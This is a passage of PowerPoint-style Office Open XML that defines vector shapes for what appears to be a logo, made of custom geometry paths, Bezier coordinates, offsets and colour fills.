                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="50" y="4903"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5049"/>
                      <a:pt x="72" y="5264"/>
                      <a:pt x="239" y="5338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="330" y="5376"/>
                      <a:pt x="457" y="5369"/>
                      <a:pt x="550" y="5307"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="565" y="5295"/>
                      <a:pt x="639" y="5240"/>
                      <a:pt x="682" y="5135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="742" y="4996"/>
                      <a:pt x="2004" y="1896"/>
                      <a:pt x="2177" y="1437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2255" y="1224"/>
                      <a:pt x="2368" y="1243"/>
                      <a:pt x="2432" y="1440"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2449" y="1485"/>
                      <a:pt x="3784" y="4886"/>
                      <a:pt x="3908" y="5094"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4033" y="5302"/>
                      <a:pt x="4178" y="5362"/>
                      <a:pt x="4351" y="5290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4520" y="5221"/>
                      <a:pt x="4602" y="4987"/>
                      <a:pt x="4535" y="4860"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4523" y="4836"/>
                      <a:pt x="2643" y="249"/>
                      <a:pt x="2643" y="249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2629" y="213"/>
                      <a:pt x="2576" y="0"/>
                      <a:pt x="2313" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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358920" y="632160"/>
              <a:ext cx="1003320" cy="287640"/>
              <a:chOff x="358920" y="632160"/>
              <a:chExt cx="1003320" cy="287640"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="172" name=""/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1128960" y="633600"/>
                <a:ext cx="233280" cy="279360"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3215" h="3889">
                    <a:moveTo>
                      <a:pt x="1170" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="10"/>
                      <a:pt x="335" y="170"/>
                      <a:pt x="139" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="636"/>
                      <a:pt x="0" y="804"/>
                      <a:pt x="0" y="990"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="2920"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3262"/>
                      <a:pt x="141" y="3521"/>
                      <a:pt x="421" y="3693"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="3825"/>
                      <a:pt x="897" y="3889"/>
                      <a:pt x="1170" y="3889"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3033" y="3889"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3155" y="3889"/>
                      <a:pt x="3215" y="3779"/>
                      <a:pt x="3215" y="3557"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3215" y="3389"/>
                      <a:pt x="3155" y="3306"/>
                      <a:pt x="3033" y="3306"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1194" y="3306"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="749" y="3306"/>
                      <a:pt x="524" y="3169"/>
                      <a:pt x="524" y="2894"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="524" y="2366"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="2366"/>
                      <a:pt x="529" y="2275"/>
                      <a:pt x="605" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="622" y="2251"/>
                      <a:pt x="3033" y="2256"/>
                      <a:pt x="3033" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3162" y="2256"/>
                      <a:pt x="3212" y="2153"/>
                      <a:pt x="3212" y="1945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3212" y="1763"/>
                      <a:pt x="3162" y="1672"/>
                      <a:pt x="3033" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3033" y="1672"/>
                      <a:pt x="648" y="1672"/>
                      <a:pt x="641" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="548" y="1670"/>
                      <a:pt x="519" y="1598"/>
                      <a:pt x="519" y="1572"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="519" y="990"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="519" y="751"/>
                      <a:pt x="770" y="603"/>
                      <a:pt x="1129" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1172" y="574"/>
                      <a:pt x="2851" y="577"/>
                      <a:pt x="2851" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3040" y="577"/>
                      <a:pt x="3191" y="447"/>
                      <a:pt x="3191" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3191" y="129"/>
                      <a:pt x="3040" y="0"/>
                      <a:pt x="2851" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1722" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1722" y="0"/>
                      <a:pt x="1172" y="0"/>
                      <a:pt x="1170" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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03720" y="633600"/>
                <a:ext cx="232920" cy="279360"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3214" h="3889">
                    <a:moveTo>
                      <a:pt x="1167" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="677" y="10"/>
                      <a:pt x="332" y="170"/>
                      <a:pt x="138" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="636"/>
                      <a:pt x="0" y="804"/>
                      <a:pt x="0" y="990"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="2920"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3262"/>
                      <a:pt x="141" y="3521"/>
                      <a:pt x="421" y="3693"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="3825"/>
                      <a:pt x="894" y="3889"/>
                      <a:pt x="1167" y="3889"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3030" y="3889"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3152" y="3889"/>
                      <a:pt x="3214" y="3779"/>
                      <a:pt x="3214" y="3557"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3214" y="3389"/>
                      <a:pt x="3152" y="3306"/>
                      <a:pt x="3030" y="3306"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1193" y="3306"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="746" y="3306"/>
                      <a:pt x="524" y="3169"/>
                      <a:pt x="524" y="2894"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="524" y="2366"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="2366"/>
                      <a:pt x="526" y="2275"/>
                      <a:pt x="602" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="619" y="2251"/>
                      <a:pt x="3030" y="2256"/>
                      <a:pt x="3030" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3159" y="2256"/>
                      <a:pt x="3212" y="2153"/>
                      <a:pt x="3212" y="1945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3212" y="1763"/>
                      <a:pt x="3159" y="1672"/>
                      <a:pt x="3032" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3032" y="1672"/>
                      <a:pt x="648" y="1672"/>
                      <a:pt x="638" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="545" y="1670"/>
                      <a:pt x="519" y="1598"/>
                      <a:pt x="516" y="1572"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="516" y="990"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="516" y="751"/>
                      <a:pt x="767" y="603"/>
                      <a:pt x="1126" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1172" y="574"/>
                      <a:pt x="2848" y="577"/>
                      <a:pt x="2848" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3037" y="577"/>
                      <a:pt x="3190" y="447"/>
                      <a:pt x="3190" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3190" y="129"/>
                      <a:pt x="3037" y="0"/>
                      <a:pt x="2848" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1722" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1722" y="0"/>
                      <a:pt x="1172" y="0"/>
                      <a:pt x="1167" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6465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58920" y="632160"/>
                <a:ext cx="230760" cy="280800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3181" h="3910">
                    <a:moveTo>
                      <a:pt x="254" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="0"/>
                      <a:pt x="110" y="16"/>
                      <a:pt x="62" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="86"/>
                      <a:pt x="36" y="100"/>
                      <a:pt x="26" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="162"/>
                      <a:pt x="0" y="210"/>
                      <a:pt x="0" y="270"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="3664"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3783"/>
                      <a:pt x="36" y="3860"/>
                      <a:pt x="105" y="3891"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="3903"/>
                      <a:pt x="199" y="3910"/>
                      <a:pt x="323" y="3910"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="445" y="3910"/>
                      <a:pt x="507" y="3826"/>
                      <a:pt x="507" y="3659"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="507" y="2458"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="507" y="2458"/>
                      <a:pt x="507" y="2327"/>
                      <a:pt x="610" y="2379"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="631" y="2387"/>
                      <a:pt x="2698" y="3881"/>
                      <a:pt x="2698" y="3881"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2724" y="3901"/>
                      <a:pt x="2813" y="3910"/>
                      <a:pt x="2968" y="3910"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3109" y="3910"/>
                      <a:pt x="3181" y="3834"/>
                      <a:pt x="3181" y="3678"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3181" y="3578"/>
                      <a:pt x="3138" y="3496"/>
                      <a:pt x="3057" y="3434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3057" y="3434"/>
                      <a:pt x="1043" y="1987"/>
                      <a:pt x="1040" y="1985"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="983" y="1946"/>
                      <a:pt x="1016" y="1899"/>
                      <a:pt x="1040" y="1877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1060" y="1858"/>
                      <a:pt x="2985" y="490"/>
                      <a:pt x="2985" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3069" y="428"/>
                      <a:pt x="3109" y="349"/>
                      <a:pt x="3109" y="251"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3109" y="98"/>
                      <a:pt x="3040" y="21"/>
                      <a:pt x="2901" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2753" y="21"/>
                      <a:pt x="2645" y="24"/>
                      <a:pt x="2617" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2617" y="45"/>
                      <a:pt x="665" y="1461"/>
                      <a:pt x="662" y="1463"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="533" y="1545"/>
                      <a:pt x="512" y="1451"/>
                      <a:pt x="507" y="1399"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="507" y="270"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="507" y="162"/>
                      <a:pt x="483" y="88"/>
                      <a:pt x="430" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380" y="19"/>
                      <a:pt x="311" y="0"/>
                      <a:pt x="254" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6465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57520" y="632160"/>
                <a:ext cx="254880" cy="287640"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3521" h="4001">
                    <a:moveTo>
                      <a:pt x="280" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="14"/>
                      <a:pt x="0" y="134"/>
                      <a:pt x="0" y="301"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="3616"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3781"/>
                      <a:pt x="113" y="3913"/>
                      <a:pt x="254" y="3913"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="392" y="3913"/>
                      <a:pt x="505" y="3781"/>
                      <a:pt x="505" y="3616"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="505" y="2564"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="505" y="2521"/>
                      <a:pt x="553" y="2509"/>
                      <a:pt x="636" y="2559"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2985" y="3949"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3076" y="4001"/>
                      <a:pt x="3188" y="3975"/>
                      <a:pt x="3274" y="3896"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3296" y="3875"/>
                      <a:pt x="3322" y="3844"/>
                      <a:pt x="3344" y="3810"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3363" y="3777"/>
                      <a:pt x="3373" y="3755"/>
                      <a:pt x="3377" y="3719"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3382" y="3683"/>
                      <a:pt x="3382" y="3631"/>
                      <a:pt x="3380" y="3609"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3365" y="3540"/>
                      <a:pt x="3334" y="3478"/>
                      <a:pt x="3274" y="3447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3274" y="3447"/>
                      <a:pt x="2997" y="3296"/>
                      <a:pt x="2880" y="3229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2476" y="2997"/>
                      <a:pt x="1540" y="2437"/>
                      <a:pt x="1540" y="2437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1509" y="2408"/>
                      <a:pt x="1584" y="2406"/>
                      <a:pt x="1584" y="2406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1584" y="2406"/>
                      <a:pt x="2588" y="2406"/>
                      <a:pt x="2590" y="2406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2614" y="2404"/>
                      <a:pt x="3475" y="2468"/>
                      <a:pt x="3516" y="1607"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3516" y="1588"/>
                      <a:pt x="3521" y="1521"/>
                      <a:pt x="3521" y="1507"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3521" y="957"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3521" y="911"/>
                      <a:pt x="3516" y="873"/>
                      <a:pt x="3516" y="832"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3509" y="600"/>
                      <a:pt x="3437" y="438"/>
                      <a:pt x="3339" y="313"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3289" y="254"/>
                      <a:pt x="3279" y="246"/>
                      <a:pt x="3224" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2971" y="0"/>
                      <a:pt x="2636" y="14"/>
                      <a:pt x="2636" y="14"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="280" y="14"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="636" y="588"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2583" y="588"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2973" y="612"/>
                      <a:pt x="3014" y="859"/>
                      <a:pt x="3014" y="940"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3014" y="947"/>
                      <a:pt x="3014" y="1514"/>
                      <a:pt x="3014" y="1516"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3014" y="1801"/>
                      <a:pt x="2598" y="1818"/>
                      <a:pt x="2598" y="1818"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2598" y="1818"/>
                      <a:pt x="651" y="1818"/>
                      <a:pt x="641" y="1818"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="529" y="1818"/>
                      <a:pt x="510" y="1732"/>
                      <a:pt x="505" y="1691"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="505" y="703"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="505" y="703"/>
                      <a:pt x="505" y="588"/>
                      <a:pt x="636" y="588"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6465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1363680" y="287280"/>
              <a:ext cx="1154160" cy="1036800"/>
              <a:chOff x="1363680" y="287280"/>
              <a:chExt cx="1154160" cy="103680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1363680" y="287280"/>
                <a:ext cx="973800" cy="926280"/>
                <a:chOff x="1363680" y="287280"/>
                <a:chExt cx="973800" cy="92628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1545120" y="393840"/>
                  <a:ext cx="792360" cy="819720"/>
                  <a:chOff x="1545120" y="393840"/>
                  <a:chExt cx="792360" cy="81972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2132640" y="393840"/>
                    <a:ext cx="204840" cy="48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59" h="7022">
                        <a:moveTo>
                          <a:pt x="2182" y="5875"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2959" y="1679"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="0" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="0"/>
                          <a:pt x="2901" y="2816"/>
                          <a:pt x="594" y="7022"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1078" y="6805"/>
                          <a:pt x="2042" y="6636"/>
                          <a:pt x="2182" y="587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4c4c4"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="b4b4b4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2045880" y="731160"/>
                    <a:ext cx="237960" cy="393840"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:rect l="l" t="t" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="3435" h="5676">
                        <a:moveTo>
                          <a:pt x="445" y="5459"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2869" y="3859"/>
                          <a:pt x="3435" y="1008"/>
                          <a:pt x="3435" y="1008"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2009" y="176"/>
                          <a:pt x="3030" y="0"/>
                          <a:pt x="1846" y="2156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1756" y="2320"/>
                          <a:pt x="880" y="3709"/>
                          <a:pt x="0" y="4398"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="142" y="4472"/>
                          <a:pt x="128" y="5676"/>
                          <a:pt x="445" y="5459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3c3c3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="4b4b4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804320" y="994680"/>
                    <a:ext cx="293040" cy="205200"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:rect l="l" t="t" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="4234" h="2959">
                        <a:moveTo>
                          <a:pt x="199" y="2959"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2306" y="2901"/>
                          <a:pt x="3739" y="1786"/>
                          <a:pt x="3959" y="1642"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4032" y="10"/>
                          <a:pt x="4234" y="0"/>
                          <a:pt x="3475" y="608"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3291" y="751"/>
                          <a:pt x="2317" y="1673"/>
                          <a:pt x="382" y="2120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="157" y="2346"/>
                          <a:pt x="0" y="2681"/>
                          <a:pt x="199" y="2959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85858"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="43434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1545120" y="1102680"/>
                    <a:ext cx="2923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4224" h="1602">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="1839" y="1602"/>
                          <a:pt x="3813" y="1394"/>
                          <a:pt x="3963" y="1406"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3936" y="1103"/>
                          <a:pt x="4224" y="542"/>
                          <a:pt x="4121" y="568"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4121" y="568"/>
                          <a:pt x="2350" y="1054"/>
                          <a:pt x="573" y="269"/>
                        </a:cubicBez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454545"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="46464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2132640" y="393840"/>
                    <a:ext cx="9180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8" h="1574">
                        <a:moveTo>
                          <a:pt x="1328" y="1285"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="833" y="642"/>
                          <a:pt x="512" y="285"/>
                          <a:pt x="0" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="0"/>
                          <a:pt x="476" y="432"/>
                          <a:pt x="1032" y="1574"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1085" y="1341"/>
                          <a:pt x="1133" y="1359"/>
                          <a:pt x="1328" y="128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bdbdbd"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="828282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" name=""/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="1363680" y="287280"/>
                  <a:ext cx="768240" cy="812520"/>
                  <a:chOff x="1363680" y="287280"/>
                  <a:chExt cx="768240" cy="81252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1550160" y="287280"/>
                    <a:ext cx="439200" cy="193320"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:rect l="l" t="t" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="6340" h="2790">
                        <a:moveTo>
                          <a:pt x="5763" y="636"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="5763" y="636"/>
                          <a:pt x="4379" y="458"/>
                          <a:pt x="2700" y="1162"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2336" y="1314"/>
                          <a:pt x="1385" y="1695"/>
                          <a:pt x="416" y="2670"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="2790"/>
                          <a:pt x="236" y="2053"/>
                          <a:pt x="284" y="1759"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="881" y="1257"/>
                          <a:pt x="1433" y="982"/>
                          <a:pt x="1954" y="735"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2686" y="377"/>
                          <a:pt x="4013" y="0"/>
                          <a:pt x="5666" y="186"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6340" y="330"/>
                          <a:pt x="6258" y="474"/>
                          <a:pt x="5763" y="63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0e0e0"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="4d4d4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1908720" y="294840"/>
                    <a:ext cx="223200" cy="9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19" h="273">
                        <a:moveTo>
                          <a:pt x="619" y="273"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="619" y="273"/>
                          <a:pt x="427" y="134"/>
                          <a:pt x="113" y="101"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="26" y="58"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="95" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="413" y="51"/>
                          <a:pt x="619" y="273"/>
                          <a:pt x="619" y="27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1d1d1"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="dadad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1363680" y="387360"/>
                    <a:ext cx="229680" cy="71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318" h="10269">
                        <a:moveTo>
                          <a:pt x="3136" y="1198"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2929" y="1417"/>
                          <a:pt x="1413" y="2776"/>
                          <a:pt x="993" y="5134"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="993" y="5134"/>
                          <a:pt x="657" y="6725"/>
                          <a:pt x="1224" y="8162"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1224" y="8162"/>
                          <a:pt x="1853" y="9795"/>
                          <a:pt x="2568" y="10269"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2568" y="10269"/>
                          <a:pt x="756" y="9458"/>
                          <a:pt x="272" y="6529"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="272" y="6529"/>
                          <a:pt x="0" y="4663"/>
                          <a:pt x="1011" y="2762"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1750" y="1386"/>
                          <a:pt x="2663" y="584"/>
                          <a:pt x="2971" y="319"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3318" y="0"/>
                          <a:pt x="3208" y="727"/>
                          <a:pt x="3136" y="1198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55555"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="46464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8" name=""/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2119320" y="974160"/>
                <a:ext cx="398520" cy="349920"/>
                <a:chOff x="2119320" y="974160"/>
                <a:chExt cx="398520" cy="34992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119320" y="974160"/>
                  <a:ext cx="398520" cy="349560"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="5498" h="4865">
                      <a:moveTo>
                        <a:pt x="528" y="10"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="36"/>
                        <a:pt x="0" y="325"/>
                        <a:pt x="28" y="646"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="873"/>
                        <a:pt x="191" y="1055"/>
                        <a:pt x="378" y="1134"/>
